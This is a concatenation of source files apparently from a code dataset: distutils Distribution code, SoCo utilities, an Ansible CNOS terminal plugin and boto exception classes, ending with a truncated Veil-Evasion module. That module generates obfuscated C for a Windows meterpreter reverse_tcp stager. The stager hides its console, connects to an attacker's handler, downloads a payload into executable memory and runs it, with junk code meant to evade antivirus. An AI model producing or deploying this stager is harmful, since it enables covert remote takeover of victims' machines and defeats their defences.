Command" % cmd_class) # Also make sure that the command object provides a list of its # known options. if not (hasattr(cmd_class, 'user_options') and isinstance(cmd_class.user_options, list)): raise DistutilsClassError(("command class %s must provide " + "'user_options' attribute (a list of tuples)") % \ cmd_class) # If the command class has a list of negative alias options, # merge it in with the global negative aliases. negative_opt = self.negative_opt if hasattr(cmd_class, 'negative_opt'): negative_opt = negative_opt.copy() negative_opt.update(cmd_class.negative_opt) # Check for help_options in command class. They have a different # format (tuple of four) so we need to preprocess them here. if (hasattr(cmd_class, 'help_options') and isinstance(cmd_class.help_options, list)): help_options = fix_help_options(cmd_class.help_options) else: help_options = [] # All commands support the global options too, just by adding # in 'global_options'. parser.set_option_table(self.global_options + cmd_class.user_options + help_options) parser.set_negative_aliases(negative_opt) (args, opts) = parser.getopt(args[1:]) if hasattr(opts, 'help') and opts.help: self._show_help(parser, display_options=0, commands=[cmd_class]) return if (hasattr(cmd_class, 'help_options') and isinstance(cmd_class.help_options, list)): help_option_found=0 for (help_option, short, desc, func) in cmd_class.help_options: if hasattr(opts, parser.get_attr_name(help_option)): help_option_found=1 if callable(func): func() else: raise DistutilsClassError( "invalid help function %r for help option '%s': " "must be a callable object (function, etc.)" % (func, help_option)) if help_option_found: return # Put the options from the command-line into their official # holding pen, the 'command_options' dictionary. opt_dict = self.get_option_dict(command) for (name, value) in vars(opts).items(): opt_dict[name] = ("command line", value) return args def finalize_options(self): """Set final values for all the options on the Distribution instance, analogous to the .finalize_options() method of Command objects. """ for attr in ('keywords', 'platforms'): value = getattr(self.metadata, attr) if value is None: continue if isinstance(value, str): value = [elm.strip() for elm in value.split(',')] setattr(self.metadata, attr, value) def _show_help(self, parser, global_options=1, display_options=1, commands=[]): """Show help for the setup script command-line in the form of several lists of command-line options. 'parser' should be a FancyGetopt instance; do not expect it to be returned in the same state, as its option table will be reset to make it generate the correct help text. If 'global_options' is true, lists the global options: --verbose, --dry-run, etc. If 'display_options' is true, lists the "display-only" options: --name, --version, etc. Finally, lists per-command help for every command name or command class in 'commands'. """ # late import because of mutual dependence between these modules from distutils.core import gen_usage from distutils.cmd import Command if global_options: if display_options: options = self._get_toplevel_options() else: options = self.global_options parser.set_option_table(options) parser.print_help(self.common_usage + "\nGlobal options:") print('') if display_options: parser.set_option_table(self.display_options) parser.print_help( "Information display options (just display " + "information, ignore any commands)") print('') for command in self.commands: if isinstance(command, type) and issubclass(command, Command): klass = command else: klass = self.get_command_class(command) if (hasattr(klass, 'help_options') and isinstance(klass.help_options, list)): parser.set_option_table(klass.user_options + fix_help_options(klass.help_options)) else: parser.set_option_table(klass.user_options) parser.print_help("Options for '%s' command:" % klass.__name__) print('') print(gen_usage(self.script_name)) def handle_display_options(self, option_order): """If there were any non-global "display-only" options (--help-commands or the metadata display options) on the command line, display the requested info and return true; else return false. """ from distutils.core import gen_usage # User just wants a list of commands -- we'll print it out and stop # processing now (ie. if they ran "setup --help-commands foo bar", # we ignore "foo bar"). if self.help_commands: self.print_commands() print('') print(gen_usage(self.script_name)) return 1 # If user supplied any of the "display metadata" options, then # display that metadata in the order in which the user supplied the # metadata options. any_display_options = 0 is_display_option = {} for option in self.display_options: is_display_option[option[0]] = 1 for (opt, val) in option_order: if val and is_display_option.get(opt): opt = translate_longopt(opt) value = getattr(self.metadata, "get_"+opt)() if opt in ['keywords', 'platforms']: print(','.join(value)) elif opt in ('classifiers', 'provides', 'requires', 'obsoletes'): print('\n'.join(value)) else: print(value) any_display_options = 1 return any_display_options def print_command_list(self, commands, header, max_length): """Print a subset of the list of all commands -- used by 'print_commands()'. """ print(header + ":") for cmd in commands: klass = self.cmdclass.get(cmd) if not klass: klass = self.get_command_class(cmd) try: description = klass.description except AttributeError: description = "(no description available)" print(" %-*s %s" % (max_length, cmd, description)) def print_commands(self): """Print out a help message listing all available commands with a description of each. The list is divided into "standard commands" (listed in distutils.command.__all__) and "extra commands" (mentioned in self.cmdclass, but not a standard command). The descriptions come from the command class attribute 'description'. """ import distutils.command std_commands = distutils.command.__all__ is_std = {} for cmd in std_commands: is_std[cmd] = 1 extra_commands = [] for cmd in self.cmdclass.keys(): if not is_std.get(cmd): extra_commands.append(cmd) max_length = 0 for cmd in (std_commands + extra_commands): if len(cmd) > max_length: max_length = len(cmd) self.print_command_list(std_commands, "Standard commands", max_length) if extra_commands: print() self.print_command_list(extra_commands, "Extra commands", max_length) def get_command_list(self): """Get a list of (command, description) tuples. The list is divided into "standard commands" (listed in distutils.command.__all__) and "extra commands" (mentioned in self.cmdclass, but not a standard command). The descriptions come from the command class attribute 'description'. """ # Currently this is only used on Mac OS, for the Mac-only GUI # Distutils interface (by Jack Jansen) import distutils.command std_commands = distutils.command.__all__ is_std = {} for cmd in std_commands: is_std[cmd] = 1 extra_commands = [] for cmd in self.cmdclass.keys(): if not is_std.get(cmd): extra_commands.append(cmd) rv = [] for cmd in (std_commands + extra_commands): klass = self.cmdclass.get(cmd) if not klass: klass = self.get_command_class(cmd) try: description = klass.description except AttributeError: description = "(no description available)" rv.append((cmd, description)) return rv # -- Command class/object methods ---------------------------------- def get_command_packages(self): """Return a list of packages from which commands are loaded.""" pkgs = self.command_packages if not isinstance(pkgs, list): if pkgs is None: pkgs = '' pkgs = [pkg.strip() for pkg in pkgs.split(',') if pkg != ''] if "distutils.command" not in pkgs: pkgs.insert(0, "distutils.command") self.command_packages = pkgs return pkgs def get_command_class(self, command): """Return the class that implements the Distutils command named by 'command'. First we check the 'cmdclass' dictionary; if the command is mentioned there, we fetch the class object from the dictionary and return it. Otherwise we load the command module ("distutils.command." + command) and fetch the command class from the module. The loaded class is also stored in 'cmdclass' to speed future calls to 'get_command_class()'. Raises DistutilsModuleError if the expected module could not be found, or if that module does not define the expected class. """ klass = self.cmdclass.get(command) if klass: return klass for pkgname in self.get_command_packages(): module_name = "%s.%s" % (pkgname, command) klass_name = command try: __import__ (module_name) module = sys.modules[module_name] except ImportError: continue try: klass = getattr(module, klass_name) except AttributeError: raise DistutilsModuleError( "invalid command '%s' (no class '%s' in module '%s')" % (command, klass_name, module_name)) self.cmdclass[command] = klass return klass raise DistutilsModuleError("invalid command '%s'" % command) def get_command_obj(self, command, create=1): """Return the command object for 'command'. Normally this object is cached on a previous call to 'get_command_obj()'; if no command object for 'command' is in the cache, then we either create and return it (if 'create' is true) or return None. """ cmd_obj = self.command_obj.get(command) if not cmd_obj and create: if DEBUG: self.announce("Distribution.get_command_obj(): " \ "creating '%s' command object" % command) klass = self.get_command_class(command) cmd_obj = self.command_obj[command] = klass(self) self.have_run[command] = 0 # Set any options that were supplied in config files # or on the command line. (NB. support for error # reporting is lame here: any errors aren't reported # until 'finalize_options()' is called, which means # we won't report the source of the error.) options = self.command_options.get(command) if options: self._set_command_options(cmd_obj, options) return cmd_obj def _set_command_options(self, command_obj, option_dict=None): """Set the options for 'command_obj' from 'option_dict'. Basically this means copying elements of a dictionary ('option_dict') to attributes of an instance ('command'). 'command_obj' must be a Command instance. If 'option_dict' is not supplied, uses the standard option dictionary for this command (from 'self.command_options'). """ command_name = command_obj.get_command_name() if option_dict is None: option_dict = self.get_option_dict(command_name) if DEBUG: self.announce(" setting options for '%s' command:" % command_name) for (option, (source, value)) in option_dict.items(): if DEBUG: self.announce(" %s = %s (from %s)" % (option, value, source)) try: bool_opts = [translate_longopt(o) for o in command_obj.boolean_options] except AttributeError: bool_opts = [] try: neg_opt = command_obj.negative_opt except AttributeError: neg_opt = {} try: is_string = isinstance(value, str) if option in neg_opt and is_string: setattr(command_obj, neg_opt[option], not strtobool(value)) elif option in bool_opts and is_string: setattr(command_obj, option, strtobool(value)) elif hasattr(command_obj, option): setattr(command_obj, option, value) else: raise DistutilsOptionError( "error in %s: command '%s' has no such option '%s'" % (source, command_name, option)) except ValueError as msg: raise DistutilsOptionError(msg) def reinitialize_command(self, command, reinit_subcommands=0): """Reinitializes a command to the state it was in when first returned by 'get_command_obj()': ie., initialized but not yet finalized. This provides the opportunity to sneak option values in programmatically, overriding or supplementing user-supplied values from the config files and command line. You'll have to re-finalize the command object (by calling 'finalize_options()' or 'ensure_finalized()') before using it for real. 'command' should be a command name (string) or command object. If 'reinit_subcommands' is true, also reinitializes the command's sub-commands, as declared by the 'sub_commands' class attribute (if it has one). See the "install" command for an example. Only reinitializes the sub-commands that actually matter, ie. those whose test predicates return true. Returns the reinitialized command object. """ from distutils.cmd import Command if not isinstance(command, Command): command_name = command command = self.get_command_obj(command_name) else: command_name = command.get_command_name() if not command.finalized: return command command.initialize_options() command.finalized = 0 self.have_run[command_name] = 0 self._set_command_options(command) if reinit_subcommands: for sub in command.get_sub_commands(): self.reinitialize_command(sub, reinit_subcommands) return command # -- Methods that operate on the Distribution ---------------------- def announce(self, msg, level=log.INFO): log.log(level, msg) def run_commands(self): """Run each command that was seen on the setup script command line. Uses the list of commands found and cache of command objects created by 'get_command_obj()'. """ for cmd in self.commands: self.run_command(cmd) # -- Methods that operate on its Commands -------------------------- def run_command(self, command): """Do whatever it takes to run a command (including nothing at all, if the command has already been run). Specifically: if we have already created and run the command named by 'command', return silently without doing anything. If the command named by 'command' doesn't even have a command object yet, create one. Then invoke 'run()' on that command object (or an existing one). """ # Already been here, done that? then return silently. if self.have_run.get(command): return log.info("running %s", command) cmd_obj = self.get_command_obj(command) cmd_obj.ensure_finalized() cmd_obj.run() self.have_run[command] = 1 # -- Distribution query methods ------------------------------------ def has_pure_modules(self): return len(self.packages or self.py_modules or []) > 0 def has_ext_modules(self): return self.ext_modules and len(self.ext_modules) > 0 def has_c_libraries(self): return self.libraries and len(self.libraries) > 0 def has_modules(self): return self.has_pure_modules() or self.has_ext_modules() def has_headers(self): return self.headers and len(self.headers) > 0 def has_scripts(self): return self.scripts and len(self.scripts) > 0 def has_data_files(self): return self.data_files and len(self.data_files) > 0 def is_pure(self): return (self.has_pure_modules() and not self.has_ext_modules() and not self.has_c_libraries()) # -- Metadata query methods ---------------------------------------- # If you're looking for 'get_name()', 'get_version()', and so forth, # they are defined in a sneaky way: the constructor binds self.get_XXX # to self.metadata.get_XXX. The actual code is in the # DistributionMetadata class, below. class DistributionMetadata: """Dummy class to hold the distribution meta-data: name, version, author, and so forth. """ _METHOD_BASENAMES = ("name", "version", "author", "author_email", "maintainer", "maintainer_email", "url", "license", "description", "long_description", "keywords", "platforms", "fullname", "contact", "contact_email", "license", "classifiers", "download_url", # PEP 314 "provides", "requires", "obsoletes", ) def __init__(self, path=None): if path is not None: self.read_pkg_file(open(path)) else: self.name = None self.version = None self.author = None self.author_email = None self.maintainer = None self.maintainer_email = None self.url = None self.license = None self.description = None self.long_description = None self.keywords = None self.platforms = None self.classifiers = None self.download_url = None # PEP 314 self.provides = None self.requires = None self.obsoletes = None def read_pkg_file(self, file): """Reads the metadata values from a file object.""" msg = message_from_file(file) def _read_field(name): value = msg[name] if value == 'UNKNOWN': return None return value def _read_list(name): values = msg.get_all(name, None) if values == []: return None return values metadata_version = msg['metadata-version'] self.name = _read_field('name') self.version = _read_field('version') self.description = _read_field('summary') # we are filling author only. self.author = _read_field('author') self.maintainer = None self.author_email = _read_field('author-email') self.maintainer_email = None self.url = _read_field('home-page') self.license = _read_field('license') if 'download-url' in msg: self.download_url = _read_field('download-url') else: self.download_url = None self.long_description = _read_field('description') self.description = _read_field('summary') if 'keywords' in msg: self.keywords = _read_field('keywords').split(',') self.platforms = _read_list('platform') self.classifiers = _read_list('classifier') # PEP 314 - these fields only exist in 1.1 if metadata_version == '1.1': self.requires = _read_list('requires') self.provides = _read_list('provides') self.obsoletes = _read_list('obsoletes') else: self.requires = None self.provides = None self.obsoletes = None def write_pkg_info(self, base_dir): """Write the PKG-INFO file into the release tree. """ with open(os.path.join(base_dir, 'PKG-INFO'), 'w', encoding='UTF-8') as pkg_info: self.write_pkg_file(pkg_info) def write_pkg_file(self, file): """Write the PKG-INFO format data to a file object. """ version = '1.0' if (self.provides or self.requires or self.obsoletes or self.classifiers or self.download_url): version = '1.1' file.write('Metadata-Version: %s\n' % version) file.write('Name: %s\n' % self.get_name() ) file.write('Version: %s\n' % self.get_version() ) file.write('Summary: %s\n' % self.get_description() ) file.write('Home-page: %s\n' % self.get_url() ) file.write('Author: %s\n' % self.get_contact() ) file.write('Author-email: %s\n' % self.get_contact_email() ) file.write('License: %s\n' % self.get_license() ) if self.download_url: file.write('Download-URL: %s\n' % self.download_url) long_desc = rfc822_escape(self.get_long_description()) file.write('Description: %s\n' % long_desc) keywords = ','.join(self.get_keywords()) if keywords: file.write('Keywords: %s\n' % keywords ) self._write_list(file, 'Platform', self.get_platforms()) self._write_list(file, 'Classifier', self.get_classifiers()) # PEP 314 self._write_list(file, 'Requires', self.get_requires()) self._write_list(file, 'Provides', self.get_provides()) self._write_list(file, 'Obsoletes', self.get_obsoletes()) def _write_list(self, file, name, values): for value in values: file.write('%s: %s\n' % (name, value)) # -- Metadata query methods ---------------------------------------- def get_name(self): return self.name or "UNKNOWN" def get_version(self): return self.version or "0.0.0" def get_fullname(self): return "%s-%s" % (self.get_name(), self.get_version()) def get_author(self): return self.author or "UNKNOWN" def get_author_email(self): return self.author_email or "UNKNOWN" def get_maintainer(self): return self.maintainer or "UNKNOWN" def get_maintainer_email(self): return self.maintainer_email or "UNKNOWN" def get_contact(self): return self.maintainer or self.author or "UNKNOWN" def get_contact_email(self): return self.maintainer_email or self.author_email or "UNKNOWN" def get_url(self): return self.url or "UNKNOWN" def get_license(self): return self.license or "UNKNOWN" get_licence = get_license def get_description(self): return self.description or "UNKNOWN" def get_long_description(self): return self.long_description or "UNKNOWN" def get_keywords(self): return self.keywords or [] def get_platforms(self): return self.platforms or ["UNKNOWN"] def get_classifiers(self): return self.classifiers or [] def get_download_url(self): return self.download_url or "UNKNOWN" # PEP 314 def get_requires(self): return self.requires or [] def set_requires(self, value): import distutils.versionpredicate for v in value: distutils.versionpredicate.VersionPredicate(v) self.requires = value def get_provides(self): return self.provides or [] def set_provides(self, value): value = [v.strip() for v in value] for v in value: import distutils.versionpredicate distutils.versionpredicate.split_provision(v) self.provides = value def get_obsoletes(self): return self.obsoletes or [] def set_obsoletes(self, value): import distutils.versionpredicate for v in value: distutils.versionpredicate.VersionPredicate(v) self.obsoletes = value def fix_help_options(options): """Convert a 4-tuple 'help_options' list as found in various command classes to the 3-tuple form required by FancyGetopt. """ new_options = [] for help_tuple in options: new_options.append(help_tuple[0:3]) return new_options
mit
simonalpha/SoCo
soco/utils.py
10
5604
# -*- coding: utf-8 -*- """This class contains utility functions used internally by SoCo.""" from __future__ import ( absolute_import, print_function, unicode_literals ) import functools import re import warnings from .compat import ( StringType, UnicodeType, quote_url ) from .xml import XML def really_unicode(in_string): """Make a string unicode. Really. Ensure ``in_string`` is returned as unicode through a series of progressively relaxed decodings. Args: in_string (str): The string to convert. Returns: str: Unicode. Raises: ValueError """ if isinstance(in_string, StringType): for args in (('utf-8',), ('latin-1',), ('ascii', 'replace')): try: # pylint: disable=star-args in_string = in_string.decode(*args) break except UnicodeDecodeError: continue if not isinstance(in_string, UnicodeType): raise ValueError('%s is not a string at all.' % in_string) return in_string def really_utf8(in_string): """Encode a string with utf-8. Really. First decode ``in_string`` via `really_unicode` to ensure it can successfully be encoded as utf-8. This is required since just calling encode on a string will often cause Python 2 to perform a coerced strict auto-decode as ascii first and will result in a `UnicodeDecodeError` being raised. After `really_unicode` returns a safe unicode string, encode as utf-8 and return the utf-8 encoded string. Args: in_string (str): The string to convert. Returns: str: utf-encoded data. """ return really_unicode(in_string).encode('utf-8') FIRST_CAP_RE = re.compile('(.)([A-Z][a-z]+)') ALL_CAP_RE = re.compile('([a-z0-9])([A-Z])') def camel_to_underscore(string): """Convert camelcase to lowercase and underscore. Recipe from http://stackoverflow.com/a/1176023 Args: string (str): The string to convert. Returns: str: The converted string. """ string = FIRST_CAP_RE.sub(r'\1_\2', string) return ALL_CAP_RE.sub(r'\1_\2', string).lower() def prettify(unicode_text): """Return a pretty-printed version of a unicode XML string. Useful for debugging. Args: unicode_text (str): A text representation of XML (unicode, *not* utf-8). Returns: str: A pretty-printed version of the input. """ import xml.dom.minidom reparsed = xml.dom.minidom.parseString(unicode_text.encode('utf-8')) return reparsed.toprettyxml(indent=" ", newl="\n") def show_xml(xml): """Pretty print an :class:`~xml.etree.ElementTree.ElementTree` XML object. Args: xml (:class:`~xml.etree.ElementTree.ElementTree`): The :class:`~xml.etree.ElementTree.ElementTree` to pretty print Note: This is used a convenience function used during development. It is not used anywhere in the main code base. """ string = XML.tostring(xml) print(prettify(string)) class deprecated(object): """A decorator for marking deprecated objects. Used internally by SoCo to cause a warning to be issued when the object is used, and marks the object as deprecated in the Sphinx documentation. Args: since (str): The version in which the object is deprecated. alternative (str, optional): The name of an alternative object to use will_be_removed_in (str, optional): The version in which the object is likely to be removed. Example: .. code-block:: python @deprecated(since="0.7", alternative="new_function") def old_function(args): pass """ # pylint really doesn't like decorators! # pylint: disable=invalid-name, too-few-public-methods # pylint: disable=missing-docstring def __init__(self, since, alternative=None, will_be_removed_in=None): self.since_version = since self.alternative = alternative self.will_be_removed_in = will_be_removed_in def __call__(self, deprecated_fn): @functools.wraps(deprecated_fn) def decorated(*args, **kwargs): message = "Call to deprecated function {0}.".format( deprecated_fn.__name__) if self.will_be_removed_in is not None: message += " Will be removed in version {0}.".format( self.will_be_removed_in) if self.alternative is not None: message += " Use {0} instead.".format(self.alternative) warnings.warn(message, stacklevel=2) return deprecated_fn(*args, **kwargs) docs = "\n\n .. deprecated:: {0}\n".format(self.since_version) if self.will_be_removed_in is not None: docs += "\n Will be removed in version {0}.".format( self.will_be_removed_in) if self.alternative is not None: docs += "\n Use `{0}` instead.".format(self.alternative) if decorated.__doc__ is None: decorated.__doc__ = '' decorated.__doc__ += docs return decorated def url_escape_path(path): """Escape a string value for a URL request path. Args: str: The path to escape Returns: str: The escaped path >>> url_escape_path("Foo, bar & baz / the hackers") u'Foo%2C%20bar%20%26%20baz%20%2F%20the%20hackers' """ # Using 'safe' arg does not seem to work for python 2.6 return quote_url(path.encode('utf-8')).replace('/', '%2F')
mit
gaddman/ansible
lib/ansible/plugins/terminal/cnos.py
86
2824
# (C) 2017 Red Hat Inc. # Copyright (C) 2017 Lenovo. # # GNU General Public License v3.0+ # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt) # # Contains terminal Plugin methods for CNOS Config Module # Lenovo Networking # from __future__ import (absolute_import, division, print_function) __metaclass__ = type import json import re from ansible.errors import AnsibleConnectionFailure from ansible.module_utils._text import to_text, to_bytes from ansible.plugins.terminal import TerminalBase class TerminalModule(TerminalBase): terminal_stdout_re = [ re.compile(br"[\r\n]?[\w+\-\.:\/\[\]]+(?:\([^\)]+\)){,3}(?:>|#) ?$"), re.compile(br"\[\w+\@[\w\-\.]+(?: [^\]])\] ?[>#\$] ?$"), re.compile(br">[\r\n]?") ] terminal_stderr_re = [ re.compile(br"% ?Error"), re.compile(br"% ?Bad secret"), re.compile(br"invalid input", re.I), re.compile(br"(?:incomplete|ambiguous) command", re.I), re.compile(br"connection timed out", re.I), re.compile(br"[^\r\n]+ not found"), re.compile(br"'[^']' +returned error code: ?\d+"), ] def on_open_shell(self): try: for cmd in (b'\n', b'terminal length 0\n'): self._exec_cli_command(cmd) except AnsibleConnectionFailure: raise AnsibleConnectionFailure('unable to set terminal parameters') def on_become(self, passwd=None): if self._get_prompt().endswith(b'#'): return cmd = {u'command': u'enable'} if passwd: # Note: python-3.5 cannot combine u"" and r"" together. Thus make # an r string and use to_text to ensure it's text # on both py2 and py3. cmd[u'prompt'] = to_text(r"[\r\n]?password: $", errors='surrogate_or_strict') cmd[u'answer'] = passwd try: self._exec_cli_command(to_bytes(json.dumps(cmd), errors='surrogate_or_strict')) except AnsibleConnectionFailure: msg = 'unable to elevate privilege to enable mode' raise AnsibleConnectionFailure(msg) def on_unbecome(self): prompt = self._get_prompt() if prompt is None: # if prompt is None most likely the terminal is hung up at a prompt return if b'(config' in prompt: self._exec_cli_command(b'end') self._exec_cli_command(b'disable') elif prompt.endswith(b'#'): self._exec_cli_command(b'disable')
gpl-3.0
boomsbloom/dtm-fmri
DTM/for_gensim/lib/python2.7/site-packages/boto/directconnect/exceptions.py
148
1239
# Copyright (c) 2013 Amazon.com, Inc. or its affiliates. All Rights Reserved # # Permission is hereby granted, free of charge, to any person obtaining a # copy of this software and associated documentation files (the # "Software"), to deal in the Software without restriction, including # without limitation the rights to use, copy, modify, merge, publish, dis- # tribute, sublicense, and/or sell copies of the Software, and to permit # persons to whom the Software is furnished to do so, subject to the fol- # lowing conditions: # # The above copyright notice and this permission notice shall be included # in all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS # OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL- # ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT # SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, # WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS # IN THE SOFTWARE. # class DirectConnectClientException(Exception): pass class DirectConnectServerException(Exception): pass
mit
g0tmi1k/veil-Evasion
modules/payloads/c/meterpreter/rev_tcp.py
12
10638
""" Obfuscated, pure C windows/meterpreter/reverse_tcp Implements various randomized string processing functions in an attempt to obfuscate the call tree. Inspiration from https://github.com/rsmudge/metasploit-loader Module built by @harmj0y """ import random from modules.common import helpers class Payload: def __init__(self): # required options self.description = "pure windows/meterpreter/reverse_tcp stager, no shellcode" self.language = "c" self.extension = "c" self.rating = "Excellent" # optional # options we require user ineraction for- format is {Option : [Value, Description]]} self.required_options = { "LHOST" : ["", "IP of the Metasploit handler"], "LPORT" : ["4444", "Port of the Metasploit handler"], "COMPILE_TO_EXE" : ["Y", "Compile to an executable"] } def generate(self): winsock_init_name = helpers.randomString() punt_name = helpers.randomString() recv_all_name = helpers.randomString() wsconnect_name = helpers.randomString() # the real includes needed includes = [ "#include <stdio.h>" , "#include <stdlib.h>", "#include <windows.h>", "#include <string.h>"] # max length string for obfuscation global_max_string_length = 10000 max_string_length = random.randint(100,global_max_string_length) max_num_strings = 10000 # TODO: add in more string processing functions randName1 = helpers.randomString() # reverse() randName2 = helpers.randomString() # doubles characters stringModFunctions = [ (randName1, "char* %s(const char *t) { int length= strlen(t); int i; char* t2 = (char*)malloc((length+1) * sizeof(char)); for(i=0;i<length;i++) { t2[(length-1)-i]=t[i]; } t2[length] = '\\0'; return t2; }" %(randName1)), (randName2, "char* %s(char* s){ char *result = malloc(strlen(s)*2+1); int i; for (i=0; i<strlen(s)*2+1; i++){ result[i] = s[i/2]; result[i+1]=s[i/2];} result[i] = '\\0'; return result; }" %(randName2)) ] helpers.shuffle(stringModFunctions) # obfuscation "logical nop" string generation functions randString1 = helpers.randomString(50) randName1 = helpers.randomString() randVar1 = helpers.randomString() randName2 = helpers.randomString() randVar2 = helpers.randomString() randVar3 = helpers.randomString() randName3 = helpers.randomString() randVar4 = helpers.randomString() randVar5 = helpers.randomString() stringGenFunctions = [ (randName1, "char* %s(){ char *%s = %s(\"%s\"); return strstr( %s, \"%s\" );}" %(randName1, randVar1, stringModFunctions[0][0], randString1, randVar1, randString1[len(randString1)/2])), (randName2, "char* %s(){ char %s[%s], %s[%s/2]; strcpy(%s,\"%s\"); strcpy(%s,\"%s\"); return %s(strcat( %s, %s)); }" % (randName2, randVar2, max_string_length, randVar3, max_string_length, randVar2, helpers.randomString(50), randVar3, helpers.randomString(50), stringModFunctions[1][0], randVar2, randVar3)), (randName3, "char* %s() { char %s[%s] = \"%s\"; char *%s = strupr(%s); return strlwr(%s); }" % (randName3, randVar4, max_string_length, helpers.randomString(50), randVar5, randVar4, randVar5)) ] helpers.shuffle(stringGenFunctions) # obfuscation - add in our fake includes fake_includes = ["#include <sys/timeb.h>", "#include <time.h>", "#include <math.h>", "#include <signal.h>", "#include <stdarg.h>", "#include <limits.h>", "#include <assert.h>"] t = random.randint(1,7) for x in xrange(1, random.randint(1,7)): includes.append(fake_includes[x]) # shuffle up real/fake includes helpers.shuffle(includes) code = "#define _WIN32_WINNT 0x0500\n" code += "#include <winsock2.h>\n" code += "\n".join(includes) + "\n" #string mod functions code += stringModFunctions[0][1] + "\n" code += stringModFunctions[1][1] + "\n" # build the winsock_init function wVersionRequested_name = helpers.randomString() wsaData_name = helpers.randomString() code += "void %s() {" % (winsock_init_name) code += "WORD %s = MAKEWORD(%s, %s); WSADATA %s;" % (wVersionRequested_name, helpers.obfuscateNum(2,4), helpers.obfuscateNum(2,4), wsaData_name) code += "if (WSAStartup(%s, &%s) < 0) { WSACleanup(); exit(1);}}\n" %(wVersionRequested_name,wsaData_name) # first logical nop string function code += stringGenFunctions[0][1] + "\n" # build punt function my_socket_name = helpers.randomString() code += "void %s(SOCKET %s) {" %(punt_name, my_socket_name) code += "closesocket(%s);" %(my_socket_name) code += "WSACleanup();" code += "exit(1);}\n" # second logical nop string function code += stringGenFunctions[1][1] + "\n" # build recv_all function my_socket_name = helpers.randomString() buffer_name = helpers.randomString() len_name = helpers.randomString() code += "int %s(SOCKET %s, void * %s, int %s){" %(recv_all_name, my_socket_name, buffer_name, len_name) code += "int slfkmklsDSA=0;int rcAmwSVM=0;" code += "void * startb = %s;" %(buffer_name) code += "while (rcAmwSVM < %s) {" %(len_name) code += "slfkmklsDSA = recv(%s, (char *)startb, %s - rcAmwSVM, 0);" %(my_socket_name, len_name) code += "startb += slfkmklsDSA; rcAmwSVM += slfkmklsDSA;" code += "if (slfkmklsDSA == SOCKET_ERROR) %s(%s);} return rcAmwSVM; }\n" %(punt_name, my_socket_name) # third logical nop string function code += stringGenFunctions[2][1] + "\n" # build wsconnect function target_name = helpers.randomString() sock_name = helpers.randomString() my_socket_name = helpers.randomString() code += "SOCKET %s() { struct hostent * %s; struct sockaddr_in %s; SOCKET %s;" % (wsconnect_name, target_name, sock_name, my_socket_name) code += "%s = socket(AF_INET, SOCK_STREAM, 0);" %(my_socket_name) code += "if (%s == INVALID_SOCKET) %s(%s);" %(my_socket_name, punt_name, my_socket_name); code += "%s = gethostbyname(\"%s\");" %(target_name, self.required_options["LHOST"][0]) code += "if (%s == NULL) %s(%s);" %(target_name, punt_name, my_socket_name) code += "memcpy(&%s.sin_addr.s_addr, %s->h_addr, %s->h_length);" %(sock_name, target_name, target_name) code += "%s.sin_family = AF_INET;" %(sock_name) code += "%s.sin_port = htons(%s);" %(sock_name, helpers.obfuscateNum(int(self.required_options["LPORT"][0]),32)) code += "if ( connect(%s, (struct sockaddr *)&%s, sizeof(%s)) ) %s(%s);" %(my_socket_name, sock_name, sock_name, punt_name, my_socket_name) code += "return %s;}\n" %(my_socket_name) # build main() code size_name = helpers.randomString() buffer_name = helpers.randomString() function_name = helpers.randomString() my_socket_name = helpers.randomString() count_name = helpers.randomString() # obfuscation stuff char_array_name_1 = helpers.randomString() number_of_strings_1 = random.randint(1,max_num_strings) char_array_name_2 = helpers.randomString() number_of_strings_2 = random.randint(1,max_num_strings) char_array_name_3 = helpers.randomString() number_of_strings_3 = random.randint(1,max_num_strings) code += "int main(int argc, char * argv[]) {" code += "ShowWindow( GetConsoleWindow(), SW_HIDE );" code += "ULONG32 %s;" %(size_name) code += "char * %s;" %(buffer_name) code += "int i;" code += "char* %s[%s];" % (char_array_name_1, number_of_strings_1) code += "void (*%s)();" %(function_name) # malloc our first string obfuscation array code += "for (i = 0; i < %s; ++i) %s[i] = malloc (%s);" %(number_of_strings_1, char_array_name_1, random.randint(max_string_length,global_max_string_length)) code += "%s();" %(winsock_init_name) code += "char* %s[%s];" % (char_array_name_2, number_of_strings_2) code += "SOCKET %s = %s();" %(my_socket_name,wsconnect_name) # malloc our second string obfuscation array code += "for (i = 0; i < %s; ++i) %s[i] = malloc (%s);" %(number_of_strings_2, char_array_name_2, random.randint(max_string_length,global_max_string_length)) code += "int %s = recv(%s, (char *)&%s, %s, 0);" % (count_name, my_socket_name, size_name, helpers.obfuscateNum(4,2)) code += "if (%s != %s || %s <= 0) %s(%s);" %(count_name, helpers.obfuscateNum(4,2), size_name, punt_name, my_socket_name) code += "%s = VirtualAlloc(0, %s + %s, MEM_COMMIT, PAGE_EXECUTE_READWRITE);" %(buffer_name, size_name, helpers.obfuscateNum(5,2)) code += "char* %s[%s];" % (char_array_name_3, number_of_strings_3) # first string obfuscation method code += "for (i=0; i<%s; ++i){strcpy(%s[i], %s());}" %(number_of_strings_1, char_array_name_1, stringGenFunctions[0][0]) # real code code += "if (%s == NULL) %s(%s);" %(buffer_name, punt_name, my_socket_name) code += "%s[0] = 0xBF;" %(buffer_name) code += "memcpy(%s + 1, &%s, %s);" %(buffer_name, my_socket_name, helpers.obfuscateNum(4,2)) # malloc our third string obfuscation array code += "for (i = 0; i < %s; ++i) %s[i] = malloc (%s);" %(number_of_strings_3, char_array_name_3, random.randint(max_string_length,global_max_string_length)) # second string obfuscation method code += "for (i=0; i<%s; ++i){strcpy(%s[i], %s());}" %(number_of_strings_2, char_array_name_2, stringGenFunctions[1][0]) # real code code += "%s = %s(%s, %s + %s, %s);" %(count_name, recv_all_name, my_socket_name, buffer_name, helpers.obfuscateNum(5,2), size_name) code += "%s = (void (*)())%s;" %(function_name, buffer_name) code += "%s();" %(function_name) # third string obfuscation method (never called) code += "for (i=0; i<%s; ++i){strcpy(%s[i], 